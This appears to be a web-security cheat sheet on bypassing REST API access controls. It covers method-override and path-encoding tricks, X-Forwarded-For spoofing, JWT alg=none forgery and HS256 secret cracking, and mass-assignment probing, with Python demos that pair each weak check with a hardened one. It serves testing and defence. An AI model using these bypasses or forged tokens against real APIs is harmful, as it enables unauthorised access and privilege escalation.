REST API - Bypasses and Privilege Escalations
REST API security testing
Methodology
https://portswigger.net/web-security/api-testing
Bypassing API filters and ACLs by rewriting HTTP methods and URLs (method-override headers, alternate verbs, path encoding and dot segments that the filter and the backend parse differently)
Access Admin Interface
Spoof the HTTP headers the backend trusts for the client's IP address or host, such as X-Forwarded-For or Host, to reach routes restricted to internal clients.
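The two bypass classes above, modelled as an added example (not code from this page or from any real gateway): a naive gate that decides on the raw request beside a hardened gate that decides on the same canonical view the backend uses. The policy rules, the trusted-proxy address 10.0.0.5, the internal range 10.0.0.0/8, the probe requests and the assumption that the backend honours X-HTTP-Method-Override are all constructed for illustration.

```python
"""Toy API gateway ACL: a naive filter beside a hardened one, and the
rewrites that bypass the naive one.  Added example, not code from any real
gateway; rules, addresses and the method-override handling are assumptions."""
import ipaddress
import posixpath
from dataclasses import dataclass, field
from urllib.parse import unquote

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")   # assumed "internal" client range
TRUSTED_PROXY = ipaddress.ip_address("10.0.0.5")     # assumed only legitimate reverse proxy


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    remote_addr: str = "203.0.113.9"                 # assumed external attacker address


def backend_view(req):
    """What the backend behind the gate actually executes.

    Assumption: the backend honours X-HTTP-Method-Override and routes on the
    percent-decoded, dot-segment-resolved path.  A gate that decides on the
    raw request therefore sees a different method and path than the backend.
    """
    method = req.headers.get("X-HTTP-Method-Override", req.method).upper()
    path = "/" + posixpath.normpath(unquote(req.path)).lstrip("/")
    return method, path


def naive_gate(req):
    """Policy: DELETE anywhere and anything under /admin need an internal client.

    Deliberately weak: raw method, raw path prefix, and the first
    X-Forwarded-For entry is believed no matter who sent it.
    """
    xff = req.headers.get("X-Forwarded-For")
    client = ipaddress.ip_address((xff.split(",")[0] if xff else req.remote_addr).strip())
    privileged = req.method.upper() == "DELETE" or req.path.startswith("/admin")
    return client in INTERNAL_NET if privileged else True


def client_ip(req):
    """Trust X-Forwarded-For only when the TCP peer is our proxy, and then only
    the last entry, which is the one that proxy appended itself."""
    peer = ipaddress.ip_address(req.remote_addr)
    xff = req.headers.get("X-Forwarded-For")
    if peer == TRUSTED_PROXY and xff:
        return ipaddress.ip_address(xff.split(",")[-1].strip())
    return peer


def hardened_gate(req):
    """Same policy, decided on the canonical view the backend will use."""
    method, path = backend_view(req)
    privileged = method == "DELETE" or path == "/admin" or path.startswith("/admin/")
    return client_ip(req) in INTERNAL_NET if privileged else True


# Constructed probe requests, one per bypass class, plus two legitimate ones.
PROBES = {
    "method override":  Request("POST", "/users/7", {"X-HTTP-Method-Override": "DELETE"}),
    "dot segment":      Request("GET", "/api/../admin/users"),
    "percent encoding": Request("GET", "/%61dmin/users"),
    "spoofed XFF":      Request("GET", "/admin/users", {"X-Forwarded-For": "10.1.2.3"}),
    "real internal":    Request("GET", "/admin/users", {"X-Forwarded-For": "10.1.2.3"},
                                remote_addr="10.0.0.5"),
    "benign":           Request("GET", "/users/7"),
}


def evaluate():
    """Return {name: (naive_allows, hardened_allows, backend_method, backend_path)}."""
    return {name: (naive_gate(r), hardened_gate(r), *backend_view(r)) for name, r in PROBES.items()}


if __name__ == "__main__":
    for name, (naive, hard, method, path) in evaluate().items():
        print(f"{name:17} naive={naive!s:5} hardened={hard!s:5} backend sees {method} {path}")
```

Each probe that the naive gate allows but the backend executes as a privileged action is a finding; when testing a real target, send the same set and compare the gate's verdict with what the backend does.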
JWT Access Token Tampering
JWT Editor: Burp extension
Available in the BApp store; also explore the advanced JWT header attacks (kid, jku, jwk injection) at https://portswigger.net/web-security/jwt#jwt-header-parameter-injections
JWT Tool
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
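To make the token-tampering step concrete, here is an added example (not code from this page, JWT Editor or jwt_tool) using only the Python standard library: it mints an HS256 token, forges a copy with the role claim rewritten and alg set to none, and runs it through a verifier that lets the token choose its own algorithm beside one that pins the algorithm server-side. It also shows the offline dictionary attack on the HS256 secret that a cracking mode performs. The secret, claims and candidate wordlist are constructed for illustration.

```python
"""Minimal JWT mint / tamper / verify to demonstrate access-token tampering.
Added example; secret, claims and wordlist are assumptions, not real values."""
import base64
import hashlib
import hmac
import json

SECRET = b"assumed-weak-secret"   # assumed server-side HS256 key


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_segment(obj) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def mint(claims, key=SECRET):
    """Issue a legitimately signed HS256 token."""
    signing_input = f"{encode_segment({'alg': 'HS256', 'typ': 'JWT'})}.{encode_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def tamper(token, new_claims, alg="none"):
    """Attacker step: rewrite claims; with alg=none the signature is dropped,
    otherwise the old (now invalid) signature is kept to show it is checked."""
    _, payload_b64, sig_b64 = token.split(".")
    claims = json.loads(b64url_decode(payload_b64))
    claims.update(new_claims)
    sig = "" if alg == "none" else sig_b64
    return f"{encode_segment({'alg': alg, 'typ': 'JWT'})}.{encode_segment(claims)}.{sig}"


def _check_hs256(header_b64, payload_b64, sig_b64, key):
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def verify_weak(token, key=SECRET):
    """Vulnerable: the token's own header picks the algorithm, so alg=none
    means 'no signature to check' and the claims are accepted as-is."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") == "none":
        return json.loads(b64url_decode(payload_b64))   # unsigned token accepted
    return _check_hs256(header_b64, payload_b64, sig_b64, key)


def verify_strict(token, key=SECRET):
    """Hardened: the algorithm is pinned server-side and must match exactly."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    return _check_hs256(header_b64, payload_b64, sig_b64, key)


def crack_secret(token, candidates):
    """Offline dictionary attack on the HS256 key: the first candidate that
    verifies the signature is the key.  Returns None if no candidate matches."""
    for word in candidates:
        try:
            verify_strict(token, word.encode())
            return word
        except ValueError:
            continue
    return None


def demo():
    """Return (role the weak verifier grants the forged token, strict verifier's verdict)."""
    forged = tamper(mint({"sub": "1042", "role": "user"}), {"role": "admin"})
    try:
        verify_strict(forged)
        strict = "accepted"
    except ValueError as e:
        strict = str(e)
    return verify_weak(forged)["role"], strict


if __name__ == "__main__":
    print(demo())
```

A real verifier library will usually refuse alg=none by default, so the first thing to check on a target is whether the token's alg is honoured at all; if the algorithm is pinned, the remaining levers are the key (cracking, key confusion) and the header parameters linked above.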
Mass Assignment
Observe the object properties returned by the API (for example in GET responses) and try to set them in create/update requests; search for hidden parameters with the Param Miner Burp extension.
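An added example of the mass-assignment check (not code from this page or any real project): a user model with fields the API returns but the client never sends, a vulnerable update handler that binds any known attribute from the request body, a hardened handler with an explicit allowlist, and a probe generator that derives candidate bodies from the observed GET response plus a short guessed-name list. The model, the WRITABLE allowlist and HIDDEN_GUESSES are constructed for illustration.

```python
"""Mass assignment: vulnerable and hardened update handlers plus a probe
generator.  Added example; model, allowlist and guessed names are assumptions."""
from dataclasses import asdict, dataclass


@dataclass
class User:
    id: int
    email: str
    is_admin: bool = False   # returned by GET /users/{id}, never sent by the UI
    credit: int = 0          # likewise


WRITABLE = {"email"}                                     # assumed: the only client-settable field
HIDDEN_GUESSES = ["role", "isAdmin", "admin", "verified"]  # assumed fragment of a name wordlist


def update_vulnerable(user, body):
    """Binds every attribute the model knows; is_admin and credit included."""
    for key, value in body.items():
        if hasattr(user, key):
            setattr(user, key, value)
    return user


def update_hardened(user, body):
    """Rejects the request outright if it names a field outside the allowlist."""
    unknown = set(body) - WRITABLE
    if unknown:
        raise ValueError(f"read-only or unknown fields: {sorted(unknown)}")
    for key, value in body.items():
        setattr(user, key, value)
    return user


def probes(observed):
    """One PATCH body per property seen in a GET response that the client does
    not normally send, with a value that would be a meaningful change, followed
    by guessed names that the response did not reveal."""
    bodies = []
    for key, value in observed.items():
        if key == "id" or key in WRITABLE:
            continue
        if isinstance(value, bool):
            bodies.append({key: not value})
        elif isinstance(value, int):
            bodies.append({key: value + 1000})
        else:
            bodies.append({key: "x"})
    bodies += [{name: True} for name in HIDDEN_GUESSES]
    return bodies


def run_probes(updater):
    """Apply every probe to a fresh user via `updater`; return the bodies that
    changed stored state, i.e. the mass-assignable fields."""
    baseline = asdict(User(7, "a@example.com"))
    effective = []
    for body in probes(baseline):
        user = User(7, "a@example.com")
        try:
            after = asdict(updater(user, body))
        except ValueError:
            continue
        if after != baseline:
            effective.append(body)
    return effective


if __name__ == "__main__":
    print("vulnerable:", run_probes(update_vulnerable))
    print("hardened:  ", run_probes(update_hardened))
```

Against a live target the same loop becomes one PATCH/PUT per probe followed by a GET to diff the object; fields that change without ever being offered by the client are the finding.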
Vulnerable API Project to practice with